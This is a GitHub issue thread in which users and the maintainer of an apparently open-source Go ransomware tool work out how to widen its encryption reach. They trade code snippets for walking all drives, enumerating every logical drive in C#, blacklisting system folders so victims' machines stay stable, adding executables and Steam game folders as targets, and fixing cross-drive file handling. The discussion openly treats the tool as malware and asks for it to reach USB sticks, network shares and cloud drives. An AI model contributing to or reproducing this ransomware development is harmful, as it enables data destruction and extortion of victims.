Closed justuandme closed 7 years ago
1 - I will investigate this behavior
2- The unlocker is compiled with the malware so both share the same cmd variables, including the InterestingDirs, so an unlocker will be useful only with the respective encrypter
This is a request for a feature that can also search directories and files in other drives like E, F, Z etc. and encrypt them. Rather than providing the full path of the folders, can it be used to search for the file extensions in other Windows drives?
2- Also search and encrypt/decrypt files extensions in other available drives.
I didn't test it but I think you can specify custom drives directly in the InterestingDirs variable. Internally I use filepath.Walk to match files on dirs and subdirs
when EDrive = fmt.Sprintf("E:\\newfolder")
This will do the job in the E drive newfolder only, but I want it to do the job in the whole E:\ drive without providing any folder name.
If I do EDrive = fmt.Sprintf("E:\\")
it doesn't work.
Is there any way to do the job in the whole drive without providing folder names?
From the filepath.Walk documentation:
func Walk(root string, walkFn WalkFunc) error
Walk walks the file tree rooted at root, calling walkFn for each file or directory in the tree, including root. All errors that arise visiting files and directories are filtered by walkFn. The files are walked in lexical order, which makes the output deterministic but means that for very large directories Walk can be inefficient. Walk does not follow symbolic links.
It's supposed to work :confused:
@justuandme Try this:
// Directories to walk searching for files
InterestingDirs = []string{
UserDir + "Pictures",
UserDir + "Documents",
UserDir + "Music",
UserDir + "Desktop",
UserDir + "Downloads",
UserDir + "Videos",
"E:\\",
}
Great, this works now! :dancing_men:
Now it's not working on the same VM after I reverted and ran the same ransom binary. It shows this error:
2016/10/14 11:04:31 rename C:\Users\Test\AppData\Local\Temp\263942.jpg E:\fdasdfsafaffasgjsjd\263942.jpg: The system cannot move the file to a different disk drive.
But the files are there at their paths.
This error is supposed to be thrown on unix systems only :confused: But I think this is related here
I will fix this as soon as possible
Thanks for your reports
Hello,
Please check this : Loop through files and folders recursively
https://gist.github.com/francoishill/a5aca2a7bd598ef5b563
and get it combined with something like : C#
foreach (string drive in Directory.GetLogicalDrives())
{
//call to Loop through files and folders recursively , and add found files to List ( list can be filtered for specific extensions like the code below.
}
Also, I think it is better to add a filter with blacklisted directories which we do not need, like Windows, Program Files, Recovery, etc.
In C# I do it like this:
static List<string> blacklist = new List<string>()
{
"$Recycle.Bin", "Documents and Settings", "Program Files", "Program Files (x86)", "ProgramData", "Recovery"
};
................
IEnumerator<DirectoryInfo> dirs;
try
{
dirs = top_directory.EnumerateDirectories("*").Where(d =>
!d.Name.Contains(blacklist[0]) &&
!d.Name.Contains(blacklist[1]) &&
!d.Name.Contains(blacklist[2]) &&
!d.Name.Contains(blacklist[3]) &&
!d.Name.Contains(blacklist[4]) &&
!d.Name.Contains(blacklist[5])).GetEnumerator();
}
I'm more into C#, hope this helps
Hello, I'm not good at GoLang nor C#... let's let mauri find it. But I think we don't need to restrict or define folder names in the C drive; instead mauri already provided some C drive paths where to encrypt. BTW I think we don't restrict some programs in "Program Files", encrypt some Steam games too xD
SteamEncrypt = fmt.Sprintf("C:\\$ProgramFilesDir")
// Directories to walk searching for files
InterestingDirs = []string{
UserDir + "Pictures",
UserDir + "Documents",
UserDir + "Music",
UserDir + "Desktop",
UserDir + "Downloads",
UserDir + "Videos",
SteamEncrypt + "\\Steam\\steamapps\\common",
}
Add exe in extensions
// Interesting extensions to match files
InterestingExtensions = []string{
// Text Files
"doc", "docx", "msg", "odt", "wpd", "wps", "txt",
...........................................
// SteamEncrypt & UserProfile Paths any exe encrypt.
"exe"
}
Moreover you can encrypt all files stored on Usb Drives/sticks, Externals Disks, Internal Disks, Onedrive, Dropbox, Google Drive, Network drives, Network Shares.
@justuandme Steam games and saves are not saved as .exe in the programs folder, so encrypting the game.exe or steam.exe is useless.
The C# code I wrote above scans all drives, not only C. Also, it is a bad idea to use the hard-coded value C as you mentioned above in "SteamEncrypt"; what if the OS is not installed on the C drive? 😉
@Hanoosh the hard-coded value is just an example, that is not the correct code. If you see my previous post above, I have asked for something which starts a loop and scans all the drives A-Z and then starts encrypting.
Whatever the extension Steam games use, we can add that extension. I'm making a list of a huge amount of extensions, will check what the Steam games extensions are and will post it here soon.
Hi guys, sorry for the delay
About this error:
2016/10/14 11:04:31 rename C:\Users\Test\AppData\Local\Temp\263942.jpg E:\fdasdfsafaffasgjsjd\263942.jpg: The system cannot move the file to a different disk drive.
The temporary file is created on AppData\Local\Temp on the System drive (C in most cases). For performance reasons I use the os.Rename to copy the temp file to the original file but on windows we cannot rename a file across drives :disappointed:
I think I'll have to open the two files and copy them via stream (io.Copy)
@justuandme Feel free to fork and add more extensions to match ;)
@mauri870 any changes so far ? did you check with all drives ?
Hi @justuandme. This error:
2016/10/14 11:04:31 rename C:\Users\Test\AppData\Local\Temp\263942.jpg E:\fdasdfsafaffasgjsjd\263942.jpg: The system cannot move the file to a different disk drive.
is fixed here
About scanning drives, it's not implemented yet because there are multiple folders that we need to ignore, otherwise it will cause system instability and crashes.
For now you can specify drives manually
I specified the drive letter manually... I specified all letters from A-Z but it crashes on scanning the valid one. Is there any way to find the total number of drives and scan those for files?
@mauri870 I have used this example before, but it didn't work for me. I'm not a Go pro :( Can you merge it or show me how to implement it?
Hi @justuandme , sorry for the delay. I will add options for exclude dirs in the future.
About identify the available drives, it's more complicated because we need load the kernel32.dll, this will add more stuff to the project rather than the actual simple string slice. I will think more about this
I'll close this issue since now we can loop all available drives by default
1- Sub directories like in current user + pictures + any sub directory of pictures. I tried with a single sub directory by providing the path:
UserDir + "Pictures\\images",
It does encrypt the images folder, but on decryption the images which are placed in the Pictures\\images folder are not readable.
2- Also search and encrypt/decrypt files extensions in other available drives.